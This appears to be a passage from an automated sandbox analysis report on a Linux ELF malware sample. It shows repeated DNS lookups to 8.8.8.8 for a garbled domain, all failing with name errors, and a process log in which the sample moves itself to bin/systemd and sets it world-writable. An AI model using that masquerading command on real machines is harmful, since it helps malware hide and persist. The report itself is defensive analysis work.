                  Mar 20, 2023 17:54:31.703013897 CET192.168.2.238.8.8.80x6432Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.723485947 CET192.168.2.238.8.8.80x6432Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.743345022 CET192.168.2.238.8.8.80xe134Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.763360023 CET192.168.2.238.8.8.80xe134Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.783502102 CET192.168.2.238.8.8.80xe134Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.803735018 CET192.168.2.238.8.8.80xe134Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.821953058 CET192.168.2.238.8.8.80xe134Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.842055082 CET192.168.2.238.8.8.80xcc36Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.862176895 CET192.168.2.238.8.8.80xcc36Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.882498026 CET192.168.2.238.8.8.80xcc36Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.902760983 CET192.168.2.238.8.8.80xcc36Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.922875881 CET192.168.2.238.8.8.80xcc36Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.943012953 CET192.168.2.238.8.8.80xf168Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.962711096 CET192.168.2.238.8.8.80xf168Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.980896950 CET192.168.2.238.8.8.80xf168Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.999319077 CET192.168.2.238.8.8.80xf168Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:52.016799927 CET192.168.2.238.8.8.80xf168Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.034152985 CET192.168.2.238.8.8.80x2cf6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.054399967 CET192.168.2.238.8.8.80x2cf6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.074590921 CET192.168.2.238.8.8.80x2cf6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.094912052 CET192.168.2.238.8.8.80x2cf6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.115159035 CET192.168.2.238.8.8.80x2cf6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.135184050 CET192.168.2.238.8.8.80xaafStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.153709888 CET192.168.2.238.8.8.80xaafStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.173207045 CET192.168.2.238.8.8.80xaafStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.191382885 CET192.168.2.238.8.8.80xaafStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.209104061 CET192.168.2.238.8.8.80xaafStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.229226112 CET192.168.2.238.8.8.80x45ccStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.247893095 CET192.168.2.238.8.8.80x45ccStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.266504049 CET192.168.2.238.8.8.80x45ccStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.284995079 CET192.168.2.238.8.8.80x45ccStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.305706024 CET192.168.2.238.8.8.80x45ccStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.323476076 CET192.168.2.238.8.8.80x3cfStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.345139027 CET192.168.2.238.8.8.80x3cfStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.366708994 CET192.168.2.238.8.8.80x3cfStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.384979010 CET192.168.2.238.8.8.80x3cfStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.405069113 CET192.168.2.238.8.8.80x3cfStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.423162937 CET192.168.2.238.8.8.80x92f4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.443373919 CET192.168.2.238.8.8.80x92f4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.463242054 CET192.168.2.238.8.8.80x92f4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.483611107 CET192.168.2.238.8.8.80x92f4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.501255035 CET192.168.2.238.8.8.80x92f4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.519351006 CET192.168.2.238.8.8.80xab28Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.539652109 CET192.168.2.238.8.8.80xab28Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.559883118 CET192.168.2.238.8.8.80xab28Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.577136993 CET192.168.2.238.8.8.80xab28Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.595082045 CET192.168.2.238.8.8.80xab28Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.614908934 CET192.168.2.238.8.8.80x570aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.633196115 CET192.168.2.238.8.8.80x570aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.651557922 CET192.168.2.238.8.8.80x570aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.671310902 CET192.168.2.238.8.8.80x570aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.689054966 CET192.168.2.238.8.8.80x570aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.706892014 CET192.168.2.238.8.8.80x6102Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.727046967 CET192.168.2.238.8.8.80x6102Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.745249987 CET192.168.2.238.8.8.80x6102Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.763377905 CET192.168.2.238.8.8.80x6102Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.781891108 CET192.168.2.238.8.8.80x6102Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 20, 2023 17:53:48.785645008 CET8.8.8.8192.168.2.230x6bd4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.804846048 CET8.8.8.8192.168.2.230x6bd4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.823394060 CET8.8.8.8192.168.2.230x6bd4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.841208935 CET8.8.8.8192.168.2.230x6bd4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.859812021 CET8.8.8.8192.168.2.230x6bd4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.881905079 CET8.8.8.8192.168.2.230xd7feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.901875973 CET8.8.8.8192.168.2.230xd7feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.922226906 CET8.8.8.8192.168.2.230xd7feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.940161943 CET8.8.8.8192.168.2.230xd7feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.960112095 CET8.8.8.8192.168.2.230xd7feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:00.980245113 CET8.8.8.8192.168.2.230x29a5Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:00.998816013 CET8.8.8.8192.168.2.230x29a5Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:01.018902063 CET8.8.8.8192.168.2.230x29a5Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:01.036487103 CET8.8.8.8192.168.2.230x29a5Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:01.057027102 CET8.8.8.8192.168.2.230x29a5Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.076638937 CET8.8.8.8192.168.2.230xe94Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.096879959 CET8.8.8.8192.168.2.230xe94Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.117151022 CET8.8.8.8192.168.2.230xe94Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.137160063 CET8.8.8.8192.168.2.230xe94Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.158864975 CET8.8.8.8192.168.2.230xe94Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.178900003 CET8.8.8.8192.168.2.230xe218Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.198868036 CET8.8.8.8192.168.2.230xe218Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.217312098 CET8.8.8.8192.168.2.230xe218Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.235939980 CET8.8.8.8192.168.2.230xe218Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.254405975 CET8.8.8.8192.168.2.230xe218Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.273155928 CET8.8.8.8192.168.2.230xaba2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.294462919 CET8.8.8.8192.168.2.230xaba2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.312766075 CET8.8.8.8192.168.2.230xaba2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.337605953 CET8.8.8.8192.168.2.230xaba2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.358800888 CET8.8.8.8192.168.2.230xaba2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.379337072 CET8.8.8.8192.168.2.230x4b33Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.400316954 CET8.8.8.8192.168.2.230x4b33Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.418440104 CET8.8.8.8192.168.2.230x4b33Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.438781023 CET8.8.8.8192.168.2.230x4b33Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.458141088 CET8.8.8.8192.168.2.230x4b33Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.476335049 CET8.8.8.8192.168.2.230xab48Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.494751930 CET8.8.8.8192.168.2.230xab48Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.512846947 CET8.8.8.8192.168.2.230xab48Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.533068895 CET8.8.8.8192.168.2.230xab48Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.551265955 CET8.8.8.8192.168.2.230xab48Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.569852114 CET8.8.8.8192.168.2.230xe516Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.587887049 CET8.8.8.8192.168.2.230xe516Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.607677937 CET8.8.8.8192.168.2.230xe516Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.625890970 CET8.8.8.8192.168.2.230xe516Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.644021034 CET8.8.8.8192.168.2.230xe516Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.664563894 CET8.8.8.8192.168.2.230x6432Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.684451103 CET8.8.8.8192.168.2.230x6432Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.702680111 CET8.8.8.8192.168.2.230x6432Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.723128080 CET8.8.8.8192.168.2.230x6432Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.743057966 CET8.8.8.8192.168.2.230x6432Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.763046026 CET8.8.8.8192.168.2.230xe134Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.783210993 CET8.8.8.8192.168.2.230xe134Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.803396940 CET8.8.8.8192.168.2.230xe134Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.821602106 CET8.8.8.8192.168.2.230xe134Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:40.841882944 CET8.8.8.8192.168.2.230xe134Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.861897945 CET8.8.8.8192.168.2.230xcc36Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.882181883 CET8.8.8.8192.168.2.230xcc36Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.902401924 CET8.8.8.8192.168.2.230xcc36Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.922569036 CET8.8.8.8192.168.2.230xcc36Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:49.942471027 CET8.8.8.8192.168.2.230xcc36Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.962444067 CET8.8.8.8192.168.2.230xf168Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.980587959 CET8.8.8.8192.168.2.230xf168Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:51.999034882 CET8.8.8.8192.168.2.230xf168Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:52.016596079 CET8.8.8.8192.168.2.230xf168Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:52.033987045 CET8.8.8.8192.168.2.230xf168Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.054052114 CET8.8.8.8192.168.2.230x2cf6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.074170113 CET8.8.8.8192.168.2.230x2cf6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.094568968 CET8.8.8.8192.168.2.230x2cf6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.114831924 CET8.8.8.8192.168.2.230x2cf6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:00.134881020 CET8.8.8.8192.168.2.230x2cf6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.153223991 CET8.8.8.8192.168.2.230xaafName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.172925949 CET8.8.8.8192.168.2.230xaafName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.191107035 CET8.8.8.8192.168.2.230xaafName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.208852053 CET8.8.8.8192.168.2.230xaafName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:08.228847980 CET8.8.8.8192.168.2.230xaafName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.247512102 CET8.8.8.8192.168.2.230x45ccName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.266140938 CET8.8.8.8192.168.2.230x45ccName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.284642935 CET8.8.8.8192.168.2.230x45ccName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.305341959 CET8.8.8.8192.168.2.230x45ccName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:14.323462009 CET8.8.8.8192.168.2.230x45ccName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.344758987 CET8.8.8.8192.168.2.230x3cfName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.366400003 CET8.8.8.8192.168.2.230x3cfName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.384679079 CET8.8.8.8192.168.2.230x3cfName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.404712915 CET8.8.8.8192.168.2.230x3cfName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:24.422852039 CET8.8.8.8192.168.2.230x3cfName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.443020105 CET8.8.8.8192.168.2.230x92f4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.462937117 CET8.8.8.8192.168.2.230x92f4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.483295918 CET8.8.8.8192.168.2.230x92f4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.500965118 CET8.8.8.8192.168.2.230x92f4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:30.518930912 CET8.8.8.8192.168.2.230x92f4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.539282084 CET8.8.8.8192.168.2.230xab28Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.559565067 CET8.8.8.8192.168.2.230xab28Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.576880932 CET8.8.8.8192.168.2.230xab28Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.594791889 CET8.8.8.8192.168.2.230xab28Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:36.614631891 CET8.8.8.8192.168.2.230xab28Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.632838964 CET8.8.8.8192.168.2.230x570aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.651206970 CET8.8.8.8192.168.2.230x570aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.670981884 CET8.8.8.8192.168.2.230x570aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.688723087 CET8.8.8.8192.168.2.230x570aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:43.706509113 CET8.8.8.8192.168.2.230x570aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.726708889 CET8.8.8.8192.168.2.230x6102Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.744993925 CET8.8.8.8192.168.2.230x6102Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.763087988 CET8.8.8.8192.168.2.230x6102Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.781603098 CET8.8.8.8192.168.2.230x6102Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:55:48.799269915 CET8.8.8.8192.168.2.230x6102Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false

                  System Behavior

                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/tmp/8oxYPvmeaT.elf
                  Arguments:/tmp/8oxYPvmeaT.elf
                  File size:4139976 bytes
                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/tmp/8oxYPvmeaT.elf
                  Arguments:n/a
                  File size:4139976 bytes
                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/8oxYPvmeaT.elf bin/systemd; chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/usr/bin/rm
                  Arguments:rm -rf bin/systemd
                  File size:72056 bytes
                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/usr/bin/mkdir
                  Arguments:mkdir bin
                  File size:88408 bytes
                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/usr/bin/mv
                  Arguments:mv /tmp/8oxYPvmeaT.elf bin/systemd
                  File size:149888 bytes
                  MD5 hash:504f0590fa482d4da070a702260e3716
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:53:47
                  Start date:20/03/2023
                  Path:/usr/bin/chmod
                  Arguments:chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@
                  File size:63864 bytes
                  MD5 hash:739483b900c045ae1374d6f53a86a279
                  Start time:17:53:48
                  Start date:20/03/2023
                  Path:/tmp/8oxYPvmeaT.elf
                  Arguments:n/a
                  File size:4139976 bytes
                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                  Start time:17:53:48
                  Start date:20/03/2023
                  Path:/tmp/8oxYPvmeaT.elf
                  Arguments:n/a
                  File size:4139976 bytes
                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                  Start time:17:53:48
                  Start date:20/03/2023
                  Path:/tmp/8oxYPvmeaT.elf
                  Arguments:n/a
                  File size:4139976 bytes
                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9